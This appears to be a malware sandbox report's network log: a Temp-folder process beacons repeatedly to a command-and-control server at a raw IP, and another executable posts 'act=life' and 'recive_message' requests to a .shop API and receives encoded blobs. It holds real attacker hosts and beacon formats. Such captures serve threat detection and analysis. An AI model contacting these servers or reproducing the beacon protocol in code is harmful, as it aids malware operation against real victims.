Dec 31, 2024 09:49:56.887685061 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:57.603605032 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50018	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:59.231152058 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:59.931427956 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50020	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:01.451570988 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:50:03.455797911 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50021	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:05.095500946 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:50:05.803459883 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50022	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:07.328083038 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:50:08.025239944 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50023	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:09.679383993 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:50:10.413489103 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50024	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:11.937598944 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:50:12.654110909 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50025	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:14.280780077 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50026	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:15.867229939 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:50:17.101953983 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50027	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:18.735858917 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:50:19.435967922 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50028	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:20.952583075 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:50:23.037642956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50029	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:24.671529055 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:50:26.071680069 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Dec 31, 2024 09:50:26.071702003 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Dec 31, 2024 09:50:26.071734905 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50030	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:27.598668098 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:50:28.307413101 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50031	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:50:29.942589045 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:50:30.632594109 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:50:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	104.21.112.1	443	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:48:28 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2024-12-31 08:48:28 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-31 08:48:29 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:48:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h77t2v2v2et4bo7ea6ilr4g676; expires=Sat, 26 Apr 2025 02:35:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2Bl3YjFBaxeXchfgG7tsSjzaduhZS58TUtWHD2Ah%2FABYeEmPhjfSE2luHLpkQW5s9ZysMpedPMPkPaEUdMJR7X3rJqcMfke93kW7J7izdhtSEQQo3xpywY9IELJlewQG9eed1Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa902c3dc1c727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2018&rtt_var=792&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1352477&cwnd=232&unsent_bytes=0&cid=8c36169329133b6a&ts=866&x=0"
2024-12-31 08:48:29 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-31 08:48:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	104.21.112.1	443	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:48:29 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: fancywaxxers.shop
2024-12-31 08:48:29 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-31 08:48:30 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:48:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k2mdqh2jae0pqchofb568h2srs; expires=Sat, 26 Apr 2025 02:35:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bac1gEOHQL6OUCHW%2BtfizaRUJ2uOs9E%2B2JPuRP5iFtguJupdIWXo9%2FyujbdTpyDvmJ10bQzbQ5edxnk%2FYP5QB7HmiBXr65HAZScYu0z1jMpEPofMH6zgNpNCdWslFPe79F6w3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa902c9d929727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1964&rtt_var=753&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1438423&cwnd=232&unsent_bytes=0&cid=69acaa605e356577&ts=504&x=0"
2024-12-31 08:48:30 UTC	238	IN	Data Raw: 31 63 61 65 0d 0a 69 5a 44 7a 41 4b 49 77 4b 63 62 43 6e 2b 7a 49 77 64 44 44 4b 71 4d 6c 6b 75 45 72 6b 57 61 30 6a 6a 63 6d 52 71 41 5a 68 54 50 79 73 6f 55 69 6d 41 51 46 35 4c 48 36 7a 76 4b 31 6f 72 5a 50 6a 77 66 7a 68 51 6d 72 41 4e 58 69 52 45 4e 71 67 6d 2f 6f 45 62 50 32 6b 6d 7a 52 56 51 58 6b 70 2b 66 4f 38 70 71 72 34 55 2f 4e 42 36 6a 44 54 76 73 45 31 65 4a 56 52 79 33 50 61 65 6c 51 34 66 79 55 61 4d 64 54 54 61 65 75 38 6f 6d 74 70 4c 47 70 52 4d 70 49 2b 6f 77 4a 76 55 54 52 39 42 55 63 5a 4f 31 38 38 56 4c 45 38 59 42 72 67 45 30 46 76 65 44 36 67 75 72 37 38 71 4a 50 77 55 6e 30 68 55 44 35 44 74 7a 71 56 45 49 73 30 48 44 6a 57 2b 48 79 6c 32 6e 4e 57 6c 6d 71 70 50 57 43 71 36 36 78 Data Ascii: 1caeiZDzAKIwKcbCn+zIwdDDKqMlkuErkWa0jjcmRqAZhTPysoUimAQF5LH6zvK1orZPjwfzhQmrANXiRENqgm/oEbP2kmzRVQXkp+fO8pqr4U/NB6jDTvsE1eJVRy3PaelQ4fyUaMdTTaeu8omtpLGpRMpI+owJvUTR9BUcZO188VLE8YBrgE0FveD6gur78qJPwUn0hUD5DtzqVEIs0HDjW+Hyl2nNWlmqpPWCq66x
2024-12-31 08:48:30 UTC	1369	IN	Data Raw: 34 51 61 42 51 4f 6a 44 45 62 4e 58 35 4f 39 45 56 54 48 50 61 2b 45 52 39 4c 79 49 49 73 64 65 43 2f 7a 67 39 59 4b 6b 70 72 47 75 54 38 42 48 34 6f 78 4a 38 41 7a 65 36 46 39 4c 4b 38 31 31 37 56 62 6a 2b 35 5a 74 78 31 70 4e 71 36 4f 39 77 4f 71 6b 71 75 45 51 67 57 66 67 67 45 72 6e 43 63 65 73 53 67 6f 39 67 6e 7a 72 45 62 4f 79 6c 32 7a 42 58 30 75 32 71 50 61 46 72 37 47 35 71 45 58 4d 52 2f 32 4a 52 76 41 45 30 65 5a 66 53 79 37 47 64 75 70 58 36 2f 4c 52 4c 49 42 56 55 2b 54 34 76 61 32 76 73 37 57 74 58 6f 4e 39 73 4a 77 48 36 6b 54 52 34 42 55 63 5a 4d 70 2b 35 46 4c 67 2f 5a 4a 71 79 30 42 4c 74 71 62 77 69 37 69 6c 74 36 39 43 77 6c 58 36 6a 55 2f 77 44 64 33 6c 55 45 4d 67 67 6a 57 6e 56 76 4f 79 79 53 4c 68 58 30 43 6f 71 75 71 4f 36 72 7a Data Ascii: 4QaBQOjDEbNX5O9EVTHPa+ER9LyIIsdeC/zg9YKkprGuT8BH4oxJ8Aze6F9LK8117Vbj+5Ztx1pNq6O9wOqkquEQgWfggErnCcesSgo9gnzrEbOyl2zBX0u2qPaFr7G5qEXMR/2JRvAE0eZfSy7GdupX6/LRLIBVU+T4va2vs7WtXoN9sJwH6kTR4BUcZMp+5FLg/ZJqy0BLtqbwi7ilt69CwlX6jU/wDd3lUEMggjWnVvOyySLhX0CoquqO6rz
2024-12-31 08:48:30 UTC	1369	IN	Data Raw: 56 58 38 69 55 2f 38 43 64 71 73 47 77 51 6a 32 6a 75 2f 45 63 48 78 68 57 48 4b 45 48 36 6e 72 76 4f 4a 76 4f 4f 74 37 31 47 42 51 50 7a 44 45 62 4d 4a 31 2b 52 54 56 69 76 50 65 4f 6c 66 35 50 65 65 61 73 42 53 52 71 47 6b 39 6f 57 70 72 72 61 7a 51 73 46 50 39 59 4a 44 2b 55 53 59 72 46 4a 63 5a 4a 6f 37 31 6b 62 67 73 4b 52 68 7a 6c 78 4d 73 75 44 69 77 4c 50 6a 74 61 30 49 6d 51 66 39 69 30 7a 32 43 39 66 6d 57 30 45 75 7a 6e 50 70 55 76 6e 39 6c 57 4c 4d 57 6b 47 70 72 76 6d 47 6f 36 69 35 70 30 6a 41 54 62 44 4e 43 66 51 63 6c 72 51 56 63 43 50 4f 64 75 67 54 33 76 47 66 62 4d 64 45 43 37 76 75 35 4d 36 74 72 2f 4c 35 43 4d 31 4f 38 49 68 44 39 77 54 52 34 56 42 48 49 38 46 32 34 46 76 6c 39 5a 56 75 79 56 39 4e 70 4b 66 35 69 37 69 6d 75 36 31 45 Data Ascii: VX8iU/8CdqsGwQj2ju/EcHxhWHKEH6nrvOJvOOt71GBQPzDEbMJ1+RTVivPeOlf5PeeasBSRqGk9oWprrazQsFP9YJD+USYrFJcZJo71kbgsKRhzlxMsuDiwLPjta0ImQf9i0z2C9fmW0EuznPpUvn9lWLMWkGprvmGo6i5p0jATbDNCfQclrQVcCPOdugT3vGfbMdEC7vu5M6tr/L5CM1O8IhD9wTR4VBHI8F24Fvl9ZVuyV9NpKf5i7imu61E
2024-12-31 08:48:30 UTC	1369	IN	Data Raw: 55 4a 37 45 72 50 72 46 4a 49 5a 4a 6f 37 37 6c 6a 35 2f 4a 39 72 7a 56 52 44 6f 36 37 77 68 61 79 6f 74 61 5a 4f 7a 45 2f 39 68 6b 72 79 41 4e 7a 2b 56 6b 38 75 7a 33 47 6e 48 36 76 31 69 53 4b 59 45 6d 79 6f 69 65 32 56 75 4c 58 79 76 67 62 59 42 2f 65 50 43 61 74 45 31 65 4e 63 53 79 7a 4b 64 4f 68 56 35 66 53 58 62 38 56 64 51 62 61 6f 38 34 4f 68 72 4c 6d 7a 53 4d 78 44 2f 49 64 42 2b 41 36 57 6f 68 56 44 50 49 49 6a 70 32 54 6d 2f 5a 46 68 31 68 4a 55 36 72 6d 39 69 61 62 6a 36 75 46 45 7a 30 66 2f 6a 30 58 34 44 4e 66 67 57 30 4d 68 79 33 50 76 51 2b 72 32 6d 57 50 4f 58 55 71 67 70 66 69 4b 72 61 65 30 72 67 69 50 42 2f 65 62 43 61 74 45 2b 63 74 67 42 67 58 34 4f 2f 67 66 38 72 4b 57 62 6f 41 4b 43 36 69 6a 38 59 61 6c 70 62 75 74 51 73 68 4d 2f Data Ascii: UJ7ErPrFJIZJo77lj5/J9rzVRDo67whayotaZOzE/9hkryANz+Vk8uz3GnH6v1iSKYEmyoie2VuLXyvgbYB/ePCatE1eNcSyzKdOhV5fSXb8VdQbao84OhrLmzSMxD/IdB+A6WohVDPIIjp2Tm/ZFh1hJU6rm9iabj6uFEz0f/j0X4DNfgW0Mhy3PvQ+r2mWPOXUqgpfiKrae0rgiPB/ebCatE+ctgBgX4O/gf8rKWboAKC6ij8YalpbutQshM/
